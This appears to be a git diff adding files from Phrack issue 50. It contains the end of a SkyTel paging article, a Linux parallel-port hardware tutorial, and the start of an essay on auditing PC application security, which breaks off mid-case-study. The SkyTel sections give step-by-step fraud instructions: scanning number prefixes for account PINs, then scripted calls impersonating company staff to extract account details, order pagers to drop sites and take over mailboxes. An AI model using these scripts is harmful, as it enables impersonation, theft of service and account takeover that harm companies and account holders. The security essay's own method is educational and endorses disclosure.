+     Yonkers
+
+     NORTH CAROLINA
+     Charlotte
+     Durham
+     Fayetteville
+     Greensboro
+     Raleigh
+     Winston-Salem
+
+     OHIO
+     Akron
+     Canton
+     Cincinnati
+     Cleveland
+     Columbus
+     Dayton
+     Parma
+     Toledo
+     Youngstown
+
+     OKLAHOMA
+     Oklahoma City
+     Tulsa
+
+     OREGON
+     Eugene
+     Portland
+     Salem
+
+     PENNSYLVANIA
+     Allentown
+     Erie
+     Philadelphia
+     Pittsburgh
+     Reading
+     Scranton
+
+     RHODE ISLAND
+     Cranston
+     Providence
+     Warwick
+
+     SOUTH CAROLINA
+     Charleston
+
+     SOUTH DAKOTA
+     Sioux Falls
+
+     TENNESSEE
+     Chattanooga
+     Clarksville
+     Knoxville
+     Memphis
+     Nashville-Davidson
+
+     TEXAS
+     Abilene
+     Amarillo
+     Arlington
+     Austin
+     Beaumont
+     Carrollton
+     Corpus Christi
+     Dallas
+     El Paso
+     Ft. Worth
+     Garland
+     Grand Prairie
+     Houston
+     Irving
+     Laredo
+     Lubbock
+     McAllen
+     Mesquite
+     Midland
+     Odessa
+     Pasadena
+     Plano
+     San Angelo
+     San Antonio
+     Tyler
+     Waco
+     Wichita Falls
+
+     UTAH
+     Provo
+     Salt Lake City
+     West Valley City
+
+     VIRGIN ISLANDS
+     St. Croix
+     St. Thomas
+
+     VIRGINIA
+     Alexandria
+     Arlington
+     Chesapeake
+     Hampton
+     Newport News
+     Norfolk
+     Portsmouth
+     Richmond
+     Roanoke
+     Virginia Beach
+
+     WASHINGTON
+     Bellevue
+     Seattle
+     Spokane
+     Tacoma
+
+     WISCONSIN
+     Green Bay
+     Kenosha
+     Madison
+     Milwaukee
+     Racine
+
+11. International Access numbers to the SkyTel system.
+
+SkyTel US Customers can access the SkyTel System from 44 countries around
+the world! Use the chart below to find the access numbers you need.
+
+Legend for notes:
+
+   * a: Pay phones may require a coin or card
+   * b: Not available from pay phones
+   * c: Not available from all phones
+   * d: Local or in-country charges may apply
+
+                    Country           Access Number     Notes
+
+             Australia             1-800-12-8078
+             Bahamas               1-800-934-6451       a
+             Bahamas               1-800-934-6451       a
+             Barbados              1-800-534-2170       b
+             Belgium               0800-1-4389          a
+             Bermuda               1-800-825-0311
+             Canada                800-759-8255         c
+             Chile                 1230-020-3220        b
+             China                 10-800-524-4624      c
+             Colombia              980-1-52547          a, c
+             Costa Rica            001800-234-4793      b
+             Denmark               8001-8671            a
+             El Salvador           0-1-800-234-9578     b, c
+             Finland               9-800-1-59402        a
+             France                05-90-3223
+             Germany               0130-8-18414
+             Greece                00800-12-2613        a, c,d
+             Guam                  1-800-671-0150       a
+             Guatemala             099-0082             a
+             Hong Kong             800-5688             a
+             Hungary               00-800-11144
+             Indonesia             001-800-011-0277
+             Ireland               1-800-55-5523
+             Israel                177-150-1572         a
+             Italy                 1678-77100           a
+             Japan                 0031-12-3373         a, c
+             Luxembourg            0800-6170
+             Malaysia              800-2652             a, d
+             Mexico                95-800-759-8255      c, d
+             Netherlands           06-022-7548          a, c
+             Netherlands Antilles  0031-12-3373         b, d
+             New Zealand           0800-447036
+             Norway                800-15617
+             Panama                001-800-507-0089
+             Portugal              0501-12-707          a, c
+             Singapore             800-1200-457         a
+             South Africa          080-09-92588         a
+             Sweden                020-79-3976          a
+             Switzerland           155-2154             a
+             Taiwan                0080-13-8341         a
+             Thailand              001-800-12-066-0249  a, c
+             United Kingdom        0800-89-3648
+             Uraguay               000-413-598-0371     a, c,d
+             Venezuela             8001-2458
+
+12. SkyTel accessible by Land, Sea or Air.
+
+     Accessibility is important in any business, but when you provide
+     mobile satellite communications to maritime, aeronautical and
+     land mobile customers, it's your main selling point.
+
+     The folks at COMSAT Mobile Communications sell communications
+     that know no bounds, so they need to keep in constant contact
+     with all their customers and prospects. That's why they rely on
+     SkyTel.
+
+     Robert Katz, director of Mobile Data for COMSAT, says, "It's not
+     just SkyTel paging that's so valuable to us. It's the whole
+     spectrum of SkyTel services." As a matter of fact, the company
+     depends on more than 160 SkyTel pagers, especially in the sales,
+     engineering and operations divisions, as well as a variety of
+     SkyTel services.
+
+     Serving as much-needed administrative support, a SkyTel Corporate
+     Access Number gives customers or employees toll-free access to
+     sending pages - with just one easy number and without having to
+     carry or remember PlNs. With a list of key COMSAT employees and
+     their PlNs, the SkyTel operator sends messages like a personal
+     assistant. Katz uses this service to send out important meeting
+     notices or project reminders, either to individuals or an entire
+     group. "It's even better than voice mail or e-mail," says Katz.
+
+     SkyTel service even works with COMSAT's office systems to keep
+     communications transparent to the caller. For example, when Katz
+     receives a call at his desk, his office voice mail system pages
+     him immediately. Wherever he is, his SkyTel pager alerts him that
+     a call is waiting. Within minutes, he phones in an access code to
+     be connected instantly. When he picks up the call, the caller
+     doesn't know if Katz is in a meeting, driving down the highway or
+     relaxing at home. All he knows is that Katz is available for him.
+
+     A loyal SkyTel customer since 1990, COMSAT is currently
+     integrating SkyTel 2-Way messaging into their day-to-day
+     operations. Of course, you would fully expect these experts in
+     satellite communications to take advantage of the best in
+     satellite messaging technology. With SkyTel they're moving full
+     speed ahead.
+
+13. Overview of SkyTel.
+
+Don't sit by the phone and wait for important calls. Carry your SkyTel
+pager and stay in touch. Let your messages find you.
+
+Anyone - from customer service reps, medical personnel and sales executives
+to busy parents and teenagers - can take advantage of the easiest
+communications solution today.
+
+SkyTel has paging services and coverage options to meet your requirements.
+In town or out, SkyTel is the only service you'll need.
+
+Only The SkyTel System includes these advances:
+
+   - Always Toll-free - no fumbling for spare change; no cost for calls,
+     from anywhere in the United States
+   - Personalized Greetings - just like an answering machine, change your
+     greeting as often as you like ... easier for callers to use and
+     understand
+   - Page Recall - stop worrying about missed messages; call in to review
+     messages from the last three days, even if your pager was turned off
+
+       If you need ...                        Then try ...
+
+ To be notified with a       SkyPager for short, simple communications.
+ number (phone number or
+ special code) that someone
+ is trying to reach you.
+
+ Full written messages in    SkyWord for receiving numeric and
+ the palm of your hand.      alphanumeric messages.
+
+                             SkyTel 2-Way for revolutionary two-way
+ To answer questions
+ immediately. Without using  communications. With SkyTel 2-Way you can
+ a phone.                    respond immediately to messages you receive,
+                             right from your pager.
+
+                             SkyTalk, giving you full-featured voice
+ To know you have a voice    mail and notification on your pager every
+ message.                    time a message is left, available with all
+                             paging services.
+
+                             SkyFax so your callers can fax easily to
+ Easy access to all of the   your unique toll-free number. You're
+ faxes that come in while    notified via your pager and can download,
+ you're out.                 save, store and forward faxes from wherever
+                             you are (not available with SkyTel 2-Way).
+
+ To know what's going on in  SkyNews and SkyQuote, providing you with
+ the world and on Wall       news or stock quotes twice daily, available
+ Street.                     to SkyWord subscribers.
+
+14. Getting Phree SkyTel Pagers
+
+    To get phree SkyTel pagers you will need to get a pin. To do this
+    you will have to do some scanning. Use the prefixes in section 16 of
+    this article. Each pin is seven digits. If an account has a personal
+    800 number, then that is the pin. For example 800-759-9826. The pin
+    is 7599826.
+
+    Hint: If you find a pin with option 3# on it. Which is alpha-numeric
+          paging. Call it up. The SkyTel operator will read you the name
+          of the owner of the pager. Now you have the owner. All you have
+          to do is goto a payphone and page the owner of the pager to the
+          payphone and bull shit him into something stupid like "This is
+          Michael Donaldson from SkyTel. We have lost some information on
+          your SkyTel account. We need it for billing purposes." He will
+          almost 99.99% of the time give it up. Your next step is to CNA
+          his number and get all the information on the number. Now you
+          have all the information on his SkyTel account. The best accounts
+          to get phree pagers with are corporate accounts because they
+          usually have many pagers under the account and will let you ship
+          a large quantity of pagers out at one time.
+
+Typical Conversation with Skytel to get Phree Pagers:
+
+(if you have a UPS bin number all the better. BIN = billing identification
+number. AKA bill shipping to another company).
+
+ SB=Skytel Bitch
+ ME=PBXPhreak
+
+    Call 800-SKY-USER
+
+    ME: "Hi, I was wondering if you can help me?"
+    SB: "Sure, what do you need help with"
+    ME: "I would like to add a pager to my SkyTel account"
+    SB: "Ok, sir. Whats your pin on your account"
+    ME: (give her the pin you have info on)
+    SB: (will ask for info on the account)
+    ME: (give her the info)
+    SB: "Ok, what type of pager and service would you like"
+    ME: "A SkyTel Tango 2 Way Pager " -- $400 each
+    SB: "Ok, I am filling an order for a Tango, would you like any extra
+         options on this pager"
+    ME: "Yes, the SkyTalk, SkyNews, SkyFax, SkyQuote and with nationwide and
+         international coverage please" (one fuckin loaded pager)
+    SB: "Ok, that will be shipped out tomorrow"
+    ME: "Miss, one thing.. I am in Canada right now at a Business conference
+         can you ship it over here."
+    SB: "Sure. Whats the address you want it delivered to."
+    ME: (give her the dropsite)
+    SB: "Is there anything else."
+    ME: "No thanks. You have yourself a good day and a Merry Christmas!!!"
+
+15. Taking over a SkyTel Mailbox
+
+    Hint: If you find a pin with option 3# on it. Which is alpha-numeric
+          paging. Call it up. The SkyTel operator will read you the name
+          of the owner of the pager. Now you have the owner. All you have
+          to do is goto a payphone and page the owner of the pager like
+          a million times and if he doesn't respond do it every day for
+          a week. This usually means the pager isn't in use. So this will
+          be a good SkyTel to take over.
+
+Typical Conversation with Skytel to takeover a SkyTel Mailbox:
+
+ SB=Skytel Bitch
+ ME=PBXPhreak
+
+    Call 800-SKY-USER
+
+    ME: "Hi, this is Michael Donaldson from AirTouch Paging"
+    SB: "How can I help you"
+    ME: "A customer was getting some options moved around when
+         our computers crashed over on our system and I need to make
+         some changes quickly, and our technician won't be here for
+         awhile. He verified all the information correctly before the
+         system crashed.
+    SB: "What is the pin number on the account"
+    ME: "7599823"
+    SB: "OK.. What needed to be changed"
+    ME: "He wanted to add SkyTalk and SkyFax and change his code to 9172"
+    SB: "Ok i will do that now.."
+    ME: "Who am I speaking too. So I can tell my manager." (just bullshit)
+    SB: (some stupid name)
+    ME: "Ok, Thank You."
+    SB: "Is there anything else."
+    ME: "No that is fine"
+    SB: "Have a good day"
+
+    That is a basic conversation that will get them to change the password,
+    and add options to the account.
+
+16. Prefixes for SkyTel Pagers and Voicemail
+
+      800-203-xxxx
+      800-213-xxxx
+      800-436-45xx
+      800-436-78xx
+      800-757-xxxx
+      800-759-xxxx (original region 759=SKY)
+
+Ways of scanning:
+
+   - Scan by Hand. I would try using Substance's Random Scan program to
+     generate numbers in the prefixes mentioned above.
+
+   - Toneloc is available at ftp.fc.net /pub/defcon/TONELOC
+
+
+17. Conclusion
+
+     That should give you tons of infoz about Skytel and how to acquire an
+     account on the Skytel system.
+
+EOF
diff --git a/phrack50/11.txt b/phrack50/11.txt
new file mode 100644
index 0000000..3f87c2d
--- /dev/null
+++ b/phrack50/11.txt
@@ -0,0 +1,242 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                    11 of 16
+
+ 
+             H A R D W A R E   I N T E R F A C I N G   F O R   T H E
+                   L I N U X   O P E R A T I N G   S Y S T E M
+
+                     By The Professor <professr@hackerz.org>
+
+  Computer control of real world devices has been an out of reach fantasy for
+most people.  In the past, it has rarely been seen outside the R&D labs of
+hardware design companies, universities, and a few dedicated hobbyist's
+basements.  It takes not only a skilled programmer, but also a person that can
+design and build small circuits.
+
+  In this article, I will show you how to use a standard IBM/PC parallel
+printer port to control devices, such as bells, relays, and lights.  I will
+also show you how to take input from devices such as DTMF decoder IC's, analog
+to digital converters, and switches.
+
+  To access the I/O port, the compiled program must be either executed by root
+or be suid root.  This could be a potential system security hazard so be
+warned.  In order to grant permissions to the port, one must use the function
+ioperm().
+
+Syntax (also see the man page):
+
+#include <unistd.h>
+ioperm(BASE_ADDRESS,NUM,PERMISSION_BIT);
+
+The first parameter is the port number to set permissions of.
+The second parameter is the number of consecutive ports to set permissions of.
+ (i.e. if num==3, BASE_ADDRESS, BASE_ADDRESS+1, and BASE_ADDRESS+2 are set).
+The third parameter is 1 to give the program permissions or 0 to remove them.
+
+Sending and receiving data via the port is done with the commands, inb() and
+outb().
+
+Syntax:
+
+#include <asm/io.h>
+value=inb(address); (address can be BASE_ADDRESS+1 or BASE_ADDRESS+2)
+outb(value,BASE_ADDRESS);
+
+
+                                 O U T P U T
+
+Making individual output data lines of a parallel printer port "turn on" is as
+simple as selecting them with a corresponding binary value.  Pin 2 (D0) is the
+least significant bit and pin 9 (D7) is the most significant bit.  If you
+wanted bits 0, 2, 3, 4, and 6 to "turn on" or go high (+5v) while leaving 1,
+5, and 7 low (ground) you would first convert the binary value to decimal and
+then send that value to the port.  (actually, there is no reason why you can't
+just send the binary value to the port)
+
+D7 D6 D5 D4 D3 D2 D1 D0
+ 0  1  0  1  1  1  0  1   ==  1011101  ==  93
+
+outb(93,BASE_ADDRESS);
+
+If you want all lines low or "off", you send a 0.
+If you want them all high or "on", you send 255.
+
+  Controlling the status of the individual bits of the I/O port is a simple
+way of controlling solid state relays, optocouplers, LED's and so on.  You
+could very easily and very safely control a high wattage lighting system in
+this manner. (assuming you are using solid state relays with back EMF
+protection). This could/would be good for closet cultivators experimenting
+with the horticulture of cannabis sativa or any other plant.  Have you ever
+wanted things such as lights and irrigation systems to come on or turn off at
+certain times? That's what your crontab file is for!  The possibilities are
+endless.
+
+
+                                  I N P U T
+
+  Standard IBM/PC parallel printer ports have nine control lines capable of
+inputting real world data.  Each printer port has three address locations.  The
+base address is used to transmit data.  The next address can input five data
+bits, using pins 11, 10, 12, 13, and 15 (referred to as BASE_ADDRESS+1 I7
+through I3), and the third port address can input or output a nibble of
+information using pins 17, 16, 14, and 1 (referred to as BASE_ADDRESS+2 I3
+through I0).  The third port address pins must be set HIGH so we can read from
+BASE_ADDRESS+2.  I'll show you how in the example.
+
+  The inputs are all active LOW, meaning your device must short them to ground
+to create a signal (switch, analog to digital converter, DTMF decoder, etc).
+This is not a problem, as most devices already do this.  The ones that don't,
+just use an inverter.
+
+  The simplest method of inputting eight data bits is to read the high nibble
+from the (BASE_ADDRESS+1) and the low nibble from the (BASE_ADDRESS+2). These
+two nibbles can be logically ORed together to form a data byte.  Some of the
+data bits are hard-wired on the printer card for active HIGH operation.  To
+get around this, I use four sections of a 7404 hex inverter to re-invert the
+inverted data lines.
+
+I7 I6 I5 I4 I3 I2 I1 I0      BASE_ADDRESS+1 INPUT LINES
+11 10 12 13 15 -- -- --      PIN NUMBER (-- = NOT USED)
+
+I7 I6 I5 I4 I3 I2 I1 I0      BASE_ADDRESS+2 INPUT LINES
+-- -- -- -- 17 16 14  1      PIN NUMBER (-- = NOT USED)
+
+  Notice both I3's of both ports are used.   Pin 15 (ERROR) is the 9th input
+of a standard IBM/PC parallel printer port.   No offense to this pin, but it's
+a pain in the ass to use and I only use it when I *have* to.  Through
+software, I disregard it.
+
+Check out this example:
+
+/* next line sets all open collector output pins HIGH
+   so we can read from BASE_ADDRESS+2)  */
+outb(inb(BASE_ADDRESS+2) || 15 , BASE_ADDRESS+2);
+High_Nibble = inb(BASE_ADDRESS+1);
+Low_Nibble = inb(BASE_ADDRESS+2);
+High_Nibble = High_Nibble & 0xF0;   /*   0xF0 = 11110000   */
+Low_Nibble = Low_Nibble & 0x0F;     /*   0x0F = 00001111   */
+Data_Byte = High_Nibble | Low_Nibble;
+
+  Pretty simple, eh?  This means you can use I7 through I4 in BASE_ADDRESS+1
+and I3 through I0 in BASE_ADDRESS+2 to give you 8 bits of data input.
+
+  All of the data lines must use a pull up resistor.  This includes the
+hard-wired active HIGH pins *after* the 7404 inverter.  This lets any device
+produce both a high and low logic signal.   Pull up resistors simply pull all
+the data lines high so software sees all 0's unless you short a pin to ground.
+(Remember these are all active LOW inputs -ground means 1)
+
+  Pins 14, 17, 1, and 11 are all hard-wired for active HIGH operation.  These
+are the pins that are signaled through the 7404 inverter IC (which makes them
+just like the rest of the pins for ease of use).
+
+NOTES:
+
+*** When compiling programs using these routines, use the -O2 optimize flag,
+or else you'll have some headaches.
+
+Port 888 is the 1st parallel printer port (LPT1)
+
+  I am not responsible for your mistakes.  If you plug 120vAC directly into
+your parallel port, I guarantee you'll destroy your computer.  Use optically
+isolated solid state relays to switch high current.
+
+  For any more info regarding I/O port programming, schematics to some fun
+projects, or to send a complaint, e-mail professr@hackerz.org
+
+  If you don't like my code, keep in mind that I design hardware for a living.
+I am not a programmer, nor have I ever claimed to be one.   My programs are
+elegant on occasion, but mostly just get the job done without actually doing
+it the best way.
+
+If you want schematics showing how to hook up the 7404 to the port, mail me.
+
+  I have some interesting things there regarding circuit design.  One of my
+favorites is a software package called "PADS"  Personal Automated Design
+Software.   It is a CAD package for schematics and PCBoard Design.   The copy
+on my web page is a public domain demo.  This demo is fully functional in
+every way.  It only limits you to something like 20 IC's, 300 tie points, etc.
+I usually do not go over these limits.
+
+Maybe this article will replace the IO-Port [mini] How-To 'cause that is only
+about 24 lines of text.
+
+                               E X A M P L E S
+                                    A N D
+                                D I A G R A M
+
+            /*  simple program to send data via parallel port  */
+
+#include <unistd.h>
+#include <asm/io.h>
+#define BASE_ADDRESS 888	/* 1st Parallel Port */ 
+
+main() {
+int port_data=0;
+int Data_Byte=255;
+ioperm(BASE_ADDRESS,3,1);	/* set permission on port */
+	outb(Data_Byte,BASE_ADDRESS); 
+	printf("Sent 255 to port %d to turn all pins HIGH\n",BASE_ADDRESS);
+ioperm(BASE_ADDRESS,3,0);	/* take away port permission */
+return(0);
+}
+         /*  end of simple program to send data via parallel port  */
+/****************************************************************************/
+       /*  simple program to take in 8 bit input via parallel port  */
+
+#include <unistd.h>
+#include <asm/io.h>
+#define BASE_ADDRESS 888	/* 1st Parallel Port */ 
+
+main() {
+int port_data=0;
+int High_Nibble, Low_Nibble, Data_Byte;
+ioperm(BASE_ADDRESS,3,1);	/* set permission on port */
+	outb(inb(BASE_ADDRESS+2) || 15 , BASE_ADDRESS+2); 
+	High_Nibble = inb(BASE_ADDRESS+1);
+	Low_Nibble = inb(BASE_ADDRESS+2);
+	High_Nibble = High_Nibble & 0xF0;   /*   0xF0 = 11110000   */
+	Low_Nibble = Low_Nibble & 0x0F;     /*   0x0F = 00001111   */
+	Data_Byte = High_Nibble | Low_Nibble;
+	printf("LN=%d HN=%d DB=%d\n",Low_Nibble,High_Nibble,Data_Byte);
+ioperm(BASE_ADDRESS,3,0);	/* take away port permission */
+return(0);
+}
+    /*  end of simple program to take in 8 bit input via parallel port  */
+/****************************************************************************/
+                    I                          I  I  I  I
+                    0                          6  7  5  4
+
+                                                     P
+                                                     A
+                    _                                P
+                    S                                E  S
+                    T                                R  E
+                    R                          _  B  |  L
+                    O                          A  U  E  E
+                    B  D  D  D  D  D  D  D  D  C  S  N  C
+                    E  0  1  2  3  4  5  6  7  K  Y  D  T
+                    _____________________________________
+                1  (o  o  o  o  o  o  o  o  o  o  o  o  o)  13
+                14  \ o  o  o  o  o  o  o  o  o  o  o  o/  25
+                     `---------------------------------'
+                      _        _  |      PINS 18       |
+                      A  E  I  S  |<----THROUGH 25---->|
+                      U  R  N  E  |       GROUND       |
+                      T  R  I  L
+                      O  O  T  |
+                      |  R     I
+                      F        N
+                      E        P
+                      E        U
+                      D  *     T        ** ERROR LINE IS NOT USED AS I3
+                         *                  (DISREGARDED VIA SOFTWARE)
+                      I  I  I  I
+                      1  3  2  3
+
+/******************** End of my little text file / how-to *******************/
+
+EOF
diff --git a/phrack50/12.txt b/phrack50/12.txt
new file mode 100644
index 0000000..ee3e180
--- /dev/null
+++ b/phrack50/12.txt
@@ -0,0 +1,451 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     12 of 16
+
+
+    		          PC Application Level Security
+
+			                by
+
+			           Sideshow Bob
+
+
+I. Introduction 
+
+   In the past, hackers interested in security have focused most of their
+efforts in finding and exploiting security holes in networking related
+operating systems, protocols, and applications.  I would like to suggest
+another arena of hacking that might be of interest to emerging hackers. 
+Although the Internet is certainly a great place to hack, you can also
+find a world of hacking sitting right on the computer at your desk.  This
+article is really aimed at a broad and young audience, for cryptographers
+of tomorrow, not today.  
+
+   The fundamental problem with the lack of security in applications today
+is that people just don't care.  Companies that produce security software
+do care about security, but most software available today has some
+component of security in them, written by programmers who do not
+understand or care about security.  When a consumer uses a piece of
+software that has advertised security features, they do not have the
+knowledge or power to determine if the security in that software is
+effective, or waiting to be exploited.  There are literally thousands of
+applications out there for PCs right now, and many of them have security
+problems just waiting to be discovered. 
+
+  In this article, I hope to provide interested new hackers the motivation 
+and knowledge to go out and explore PC applications they have access to in
+order to determine if they have security problems.  Giving out exploits is
+definitely NOT the goal of this article, I decided to provide one example
+to show the process at work, but I leave it up to the readers to go out and
+hack for themselves.
+
+  If you find security holes of your own in PC applications, I strongly
+encourage you to inform the companies involved, and post your findings in
+an appropriate public forum.  If you learn from this article, helping the
+security community by letting other people know about security problems in
+PC software is the greatest compliment you could give me. 
+  
+
+II. Finding an Candidate
+
+  Just exactly what I am talking about when I say PC application security? 
+First off, I am talking about mass consumer operating systems.  Unix and
+NT are being examined by many security people today in great depth for
+security holes, and there is definitely a good reason for that, but this
+article is focused on the computers sitting at most people's desks. 
+Windows and Mac-OS are both widely used legitimate operating systems. 
+
+  Some security people might tell you if you care about security, don't
+run Windows '95.  That is an easy answer, it is far easier to build secure
+applications on top of more secure operating systems.  But that does not
+address the realistic security threats that exist on these operating
+systems.  The fact is, nobody is going to ruin your life, steal your
+money, or cause millions in harm solely because of a vulnerability in one
+of these programs.  But as a consumer, you should expect and DEMAND that
+when someone tells you their program is secure that they aren't flat out
+lying to your face.  When someone tells you your personal information you
+enter into a program is protected by a password, you should DEMAND that
+without that password, your data is protected from your family, your
+friends, and even a friendly visit from your local law enforcement agency. 
+
+  What programs should you look for with security holes?  Quite simply,
+anything that claims to have any security in it.  The most obvious tip-off
+is anything with passwords.  In addition, anything that has users,
+restricts access, or claims to protect your data.  Encryption and
+authentication are big buzzwords that someone is messing with security. 
+Look on your hard drive, look in computer stores, look on the Internet for
+shareware and freeware (if its free, its ok if it lies about what it does?
+I don't think so.).  Not every program has any element of security in it,
+but lots do.  Not every program you find will have security holes, but if
+you spend enough time and look at enough programs, you are going to find a
+lot that do.  I would especially encourage you to not limit yourself to
+high-profile, popular applications.  Certainly those are viable
+candidates, but there are a lot more choices than that.  If you have found
+an application, now you are ready to hack! 
+
+
+III. Finding Vulnerabilities
+
+A. Application Purpose
+
+  You have found a candidate application, and now you want to find out if
+it is insecure.  The first thing you want to do is to learn how the
+program works.  The worst of the worst applications will allow you to
+subvert security directly from within the application.  An example of this
+was the first version of Microsoft "Bob".  After incorrectly entering your
+password too many times, Bob would wisely figure out that you forgot your
+password and ask you if you wanted to change it. 
+
+  Determine what the goal of the security in the application is. 
+Generally this will be to protect sensitive information in the program. 
+For the candidate application, determine what information is being
+protected.  It might only be a small sub-set of the data, or perhaps all
+of it.  Often the product won't tell you what it is trying to protect, so
+you will need to do some digging inside the program to discover it.  Some
+programs might let anyone read data, but only authorized users modify it. 
+Other programs might let anyone enter in new data, but only authorized
+users read what has been entered.  Another program might let anyone read
+and enter in new data, but only let authorized users delete individual
+entries (in an insecure OS, anyone could delete the entire database, but
+that does not imply one could selectively remove information from a
+database). 
+
+B. User Interaction
+
+  Next, figure out all the different elements of the program that allow
+the user to interact with the security module of the program.  Where does
+it ask for usernames?  Where does it ask for passwords? Can I change a
+password?  Can I remove a password?  Can I password protect different
+parts of a file?  Do I have any options as to what kind of security is
+employed?  Can I disable security altogether?  Do I protect a file, a
+database, a user?  This is the typical user level interaction with the
+program.  I would not even attempt to start digging at a lower level of
+the program until you are an expert on how the program functions at the
+user interface level. 
+
+C. Digging Deeper
+
+  Now that you have comprehensively examined and understand the program at
+the normal user level, you are ready to start hacking, and that means
+figure out how the program works.  Now, if you are extremely fortunate,
+you may have source code to the program and will be able to simply read
+that source and fully understand how it works.  Another method for
+figuring out how the program works is to disassemble the program and read
+through the assembly code of the program as it executes.  This is a
+reasonable method and sometimes the best, but it requires a thorough
+understanding of assembly language and in order to make this article
+accessible to anyone interested, I am going to ignore that possibility. 
+If you are interested in doing so, I suggest picking up a good book on
+assembly and a high quality debugging tool. 
+
+  If you have the most typical application of security in your
+application, the security is meant to protect some sensitive information. 
+Somewhere on your hard drive, in some form, is that sensitive information:
+Find It!  Usually this isn't hard, you install the application somewhere
+and if it is well behaved it doesn't put the data in some random location
+on your hard drive (but be forewarned, some do exactly to confuse you at
+this step).  Start out with a fresh installation of the software on your
+drive, and then enter some data into the application, and see what
+changed.  Now you should know what file(s) data gets written out to. 
+
+D. File Modifications
+
+  Look at the directory listings, sometimes the filename itself is a clue.
+Save directory listings out to a file, and then make some modification in
+the program (and save), and make another directory listing.  For each
+listing, write down what you did between that and the last listing.  Now
+you have a bunch of directory listings, which may or may not help you. 
+You need to try and interpret this data to tell if there is anything you
+can learn about how the program works.  In the worst case (for you),
+absolutely nothing will change.  Usually at least timestamps on the files
+will change, telling you what files were written to. 
+
+  Does every user or database you enter get written to a new file which is
+the name of the user, or does it all get written to one file?  Does each
+new entry create a new file?  Does one file get bigger by a fixed amount
+of size for each entry you add?  Is each file created the same size?  Do
+you recognize the extension of the file? 
+
+E. File Contents
+
+  If you have made any progress at all by this point, you should be able
+to narrow down what file or files you need to examine in more depth.  The
+best thing to do is to just look at the files.  There are two things you
+need at this point:  a good hex viewer and a good diff utility.  The hex
+viewer should let you know look at both the ASCII text and binary contents
+of the file; for DOS something like the shareware List utility is good.  A
+diff utility will take 2 or more files as input and tell you what has
+changed between them.  This will automate telling you what has changed in
+the files when you make a change in the data.
+
+  Quite simply, use these two utilities.  Take a look inside the files
+that you KNOW have to contain the sensitive data.  Now if a program is
+meant to protect you from reading the data and your hex viewer is sitting
+there and you see it all in front of your face, you have found a problem. 
+If you change an 'a' to a 'b' in the application and one byte of data is
+incremented one byte in the file, you are getting closer.  In many cases,
+you will need to enter in a lot of data into the application and compare
+numerous resulting files in order to figure out exactly what and where
+things change. 
+
+  If data is being protected, the worst case (for you) is that it is
+actually being encrypted with a known secure algorithm.  Does that mean it
+is secure?  No, through thorough cryptanalysis, serious computing power,
+or implementation flaws, one might still be able to read the data.  But
+this sort of analysis is left to professionals in that field, and not the
+target of this article.  For you, you may have to find alternative methods
+to gain access which are probably far easier to begin with.  This might
+mean keystroke logging, social engineering, or simply trying to brute
+force attack the situation. 
+
+  A more common situation is that some, but not all of the data is being
+encrypted.  You will very likely be able to extract sensitive information
+that the users of the program thinks is sensitive and should be secure,
+but the application programmer's decided was not part of the sensitive
+date.  Not clearly communicating what is being protected and what isn't
+should be an indication that everything is being protected, but that is
+very often not the case at all. 
+
+  Another common situation is that the data is being poorly encrypted. 
+This is usually the case if you can't read the data in text in the files,
+but you are able to pick up clear patterns of what is being changed.  Good
+encryption should make data that looks 'random', if what you are looking
+at looks decidedly not random, there is a problem. 
+
+
+IV. Exploiting Vulnerabilities
+
+  I will finish up this article with an example of how to work through this
+process from finding a program to exploiting the vulnerability.  Ziff-Davis 
+Interactive has been advertising and offering a free Windows utility known 
+as "Password Pro" for the sole purpose of letting Windows users maintain 
+passwords in a central database securely.  On the Internet today, people 
+(not to mention hackers) have accounts on numerous machines and managing the 
+passwords for all of these systems is not a trivial task.  With the increasing
+popularity of requiring registration to gain access to all the features of a 
+web site, users are accumulating more and more accounts than ever before.  
+
+   In the past, users have taken on several solutions to this problem.  Some
+people use the same account name and password everywhere they go.  Obviously
+this presents a major security problem, as there is no way to guarantee the
+security of any one of the accounts that they use, much less all of them.  If
+their password is compromised, it is an even more daunting task to change the
+password on every site that is being used.  Still, this requires a user
+maintain a list of systems they have accounts on, and with more people using
+the net everyday, it is inevitable that some people will attempt to use the
+same account name.
+
+   Another possible solution people have used is to maintain a cleartext file
+on their system, or a physical notebook that has a list of usernames and
+passwords.  Using paper and pen certainly will eliminate hackers over the
+Internet from gaining access, but if you have ever seen War Games you know
+that crackers are not above physically snooping around your home or office
+in order to find out passwords.  Leaving a plaintext file on your system is
+an even worse solution.  If you are running an insecure operating system
+such as DOS or Windows '95, anyone that can sit down at your computer will
+be able to read it.  Even with Windows NT or a Unix operating system, you do
+not want anyone that can gain administrator/root access to the machine to
+immediately gain access to every machine on the Internet that you have an
+account on.  
+
+   While there is no perfect solution preventing someone with root access to 
+the box you are using from snooping your keystrokes or sniffing your sessions,
+it is certainly more work to do so than to simply read a cleartext file.  So,
+it is clear that for many users on the Internet today, there is a definite 
+use for the type of utility that ZD Net is providing.  Further, as will be
+explained in this article, there are definitely fairly secure methods of 
+writing and using such a database.  It is unfortunate that Ziff-Davis has 
+implemented this tool in such a manner as to actually make it easier for
+people to obtain users' account names and passwords.  The author of this
+utility was informed through appropriate channels of this vulnerability
+in his software and as of the release of this article, an upgraded version
+with a well known encryption algorithm should be available.  
+
+   All of my work with regards to Password Pro was done by modifying accounts
+and entries through the normal operation of the program, and then viewing the
+changes that were made to the corresponding .lst files.  At no point did I
+attempt to disassemble the Password Pro code, although that would have 
+resulted in the same ultimate findings.
+
+   For each user on a machine that wishes to use Password Pro, a file is
+created in the Password Pro directory with a filename of <username>.lst.  When
+you first start-up Password Pro, it prompts you for a username and password.
+When you enter a filename, it looks for a file with the .lst extension matching
+that username.  If it finds the file, it then reads the password that you are
+prompted for, and attempts to validate the password with the one stored in the
+file.  If the file does not exist, the user is asked if he wants to create a
+new account; if so he can then enter and confirm a password and a file is
+created.  
+
+   The file format of the user .lst files is proprietary.  When the file is
+first created, it is 32 bytes in length.  Users can then add entries to the
+file which contain a system name, account name, password, and password 
+expiration.  Adding a single entry to a new .lst file increases the file size
+to 166 bytes.
+
+   Viewing the file showed that the Password Pro password did not show up
+in plaintext anywhere in the file, nor did any of the passwords for the
+systems that users had entered.  System names and account names were however
+in plaintext; my first disappointment in examining the security of the program.
+
+   My first thoughts with regards to the file format was simply that the
+password was stored in the first 32 bytes of the file, and the entries were
+stored in fixed length structures beyond that.  If each entry's password was
+actually encrypted with the password that was entered by the user, there would
+be no way to directly view the contents of the file.  At this point in time,
